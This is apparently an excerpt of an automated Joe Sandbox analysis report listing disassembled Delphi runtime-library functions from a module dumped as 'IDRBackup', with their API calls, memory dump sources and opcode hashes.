                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D446
                                                                                                  • lstrlenA.KERNEL32(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D455
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D461
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D46A
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D474
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D485
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D491
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D49B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$Char$qqrx20Unicode$qqrpbuipcuiUtf8lstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1537582155-0
                                                                                                  • Opcode ID: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                  • Instruction ID: 1243ab6cbdefdf8345f412232093dd449079060f735b143d8bc3f4c3f6575941
                                                                                                  • Opcode Fuzzy Hash: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                  • Instruction Fuzzy Hash: E101F534601A84ABFB11DBA5D8B299EB3E9DFA4210FE58773B50097212DB74EE01D1E4
                                                                                                  Function 50008224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: T@P
                                                                                                  • API String ID: 0-2218095447
                                                                                                  • Opcode ID: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                  • Instruction ID: 27dc2a38aba9eb27cd1e85926dff11305057f2316d7a6dc2ed62153db4641c43
                                                                                                  • Opcode Fuzzy Hash: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                  • Instruction Fuzzy Hash: ED51B934900B80CFF724CFA8EC64B867BE0BB45320F81472EE98587262DB759884CB65
                                                                                                  Function 500085B4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000860A
                                                                                                  • @System@TObject@Free$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008617
                                                                                                  • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000861C
                                                                                                  • @System@UnregisterModule$qqrp17System@TLibModule.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008644
                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000865C
                                                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008694
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$AcquireExceptionObject$qqrv$ExitFreeFree$qqrvLibraryModuleModule$qqrp17Object@ProcessUnregister
                                                                                                  • String ID: T@P
                                                                                                  • API String ID: 3627422618-2218095447
                                                                                                  • Opcode ID: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                  • Instruction ID: 4a4c4bef56c973cbd5feeae4d951ec7c4dcbae2887cfb847883f1a9252908ba7
                                                                                                  • Opcode Fuzzy Hash: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                  • Instruction Fuzzy Hash: 5721AD70901BC18FF7209BB498A4B86B6E47B54324F860B2EEAC583252DBB5DC84CB55
                                                                                                  Function 5001C924 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C9B7), ref: 5001C94D
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C9B7), ref: 5001C970
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C9B7), ref: 5001C991
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C9B7), ref: 5001C99C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Asg$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringx20
                                                                                                  • String ID: .\:
                                                                                                  • API String ID: 1552234271-496007442
                                                                                                  • Opcode ID: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                  • Instruction ID: 4b29117d5e5b6616636b4a21a03f3e77820cdaa5a79e53c5ecbb7995722f26fe
                                                                                                  • Opcode Fuzzy Hash: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                  • Instruction Fuzzy Hash: 6001D630A112C8EB9B11DFB9DD56CAEB3F9EF9632076043B6F400D3251DA70DE419691
                                                                                                  Function 50010D48 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010D4D
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010D5F
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120 ref: 50010D98
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010DA1
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120 ref: 50010DB4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckNumber$qqr26Unicode$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: 0$9
                                                                                                  • API String ID: 940830643-1975997740
                                                                                                  • Opcode ID: f1847998efdb39b59314800ab2b7d4b6bfe1a4e47e37d1145b2ddf5edbe504e7
                                                                                                  • Instruction ID: ca158e9595d5b8df393e14bdbef67b9979e5ff35cdaa91c6b3d555daa54abe26
                                                                                                  • Opcode Fuzzy Hash: f1847998efdb39b59314800ab2b7d4b6bfe1a4e47e37d1145b2ddf5edbe504e7
                                                                                                  • Instruction Fuzzy Hash: 8701D650B165904AE72467B0BC612B933D26791302B88027FF497CB6D3CA7995D5E760
                                                                                                  Function 5000D840 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D85E
                                                                                                    • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004E90
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D868
                                                                                                    • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004EA4
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D872
                                                                                                    • Part of subcall function 50003F0C: CloseHandle.KERNEL32(?,5000D87C,00000000,5000D89E), ref: 50003F1B
                                                                                                    • Part of subcall function 50003F0C: VirtualFree.KERNEL32(?,00000000,00008000,5000D87C,00000000,5000D89E), ref: 50003F4B
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D881
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D88B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Close$qqrr15Text$Clr$qqrpvFreeRes$qqri$CloseHandleMem$qqrpvVirtual
                                                                                                  • String ID: 0CP$`@P
                                                                                                  • API String ID: 1074734335-699206834
                                                                                                  • Opcode ID: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                  • Instruction ID: 65ae3e41759c052dc381d089f7c5f52dc025f958349b81aa71df701aec3d44ee
                                                                                                  • Opcode Fuzzy Hash: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                  • Instruction Fuzzy Hash: 98E092795099C84B77867BE8783242D7698FFD6D143D24B63FD4486602CE38882157B7
                                                                                                  Function 50002918 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 500029AE
                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 500029C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: 7c45e2e85974a259c0a9710e2743f4c14eb2d2fa6527f7773eb08439326dd73a
                                                                                                  • Instruction ID: e297e28b8d4201adb38443583ce835d2b097a86928e3fdd3a1d09e16793e4692
                                                                                                  • Opcode Fuzzy Hash: 7c45e2e85974a259c0a9710e2743f4c14eb2d2fa6527f7773eb08439326dd73a
                                                                                                  • Instruction Fuzzy Hash: 5671F7316456808FF325CF68DD94B8ABBD0AF95314F94836EE9488B3D2D7B0E845C792
                                                                                                  Function 5001B690 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6D2
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6E0
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B6FD
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B725
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001B78E), ref: 5001B739
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001B78E), ref: 5001B743
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001B78E), ref: 5001B750
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2845561448-0
                                                                                                  • Opcode ID: bf0cfcdcd351cc12fb7600fa998fc1f6185d974cd3725ac41fa1c8af8d435e51
                                                                                                  • Instruction ID: 13f022dda2a44bd9837e8a7c0187e17156b0a537b5c6812678d5b7095c279c4f
                                                                                                  • Opcode Fuzzy Hash: bf0cfcdcd351cc12fb7600fa998fc1f6185d974cd3725ac41fa1c8af8d435e51
                                                                                                  • Instruction Fuzzy Hash: 0231A731A042899FDF01EFA4DD5299EFBF5EFD4310F1042A6E940A3295E7709E81C690
                                                                                                  Function 50016998 Relevance: 12.1, APIs: 8, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169BA
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169FB
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169EF
                                                                                                    • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A27
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A33
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A4A
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$Stringx20$Cat3$qqrr20Stringt2$Asg$qqrr20FromStr$qqriStringSysutils@$CharChar$qqrr20Len$qqrr20StringbStringpci
                                                                                                  • String ID:
                                                                                                  • API String ID: 2719714811-0
                                                                                                  • Opcode ID: abe00f2d5019f9ca9630ead1b1a181555649122de7a3af72321aa8d936361c12
                                                                                                  • Instruction ID: ea3395305638f272936f2b0549da07458c661ac4152f8a557e01a894cc4a250d
                                                                                                  • Opcode Fuzzy Hash: abe00f2d5019f9ca9630ead1b1a181555649122de7a3af72321aa8d936361c12
                                                                                                  • Instruction Fuzzy Hash: 0B21B0747022449BE708CE99DCA16AEB3E7EBCD300FA0863FF505D7341E675AD018694
                                                                                                  Function 5002B8AC Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8E6
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8FB
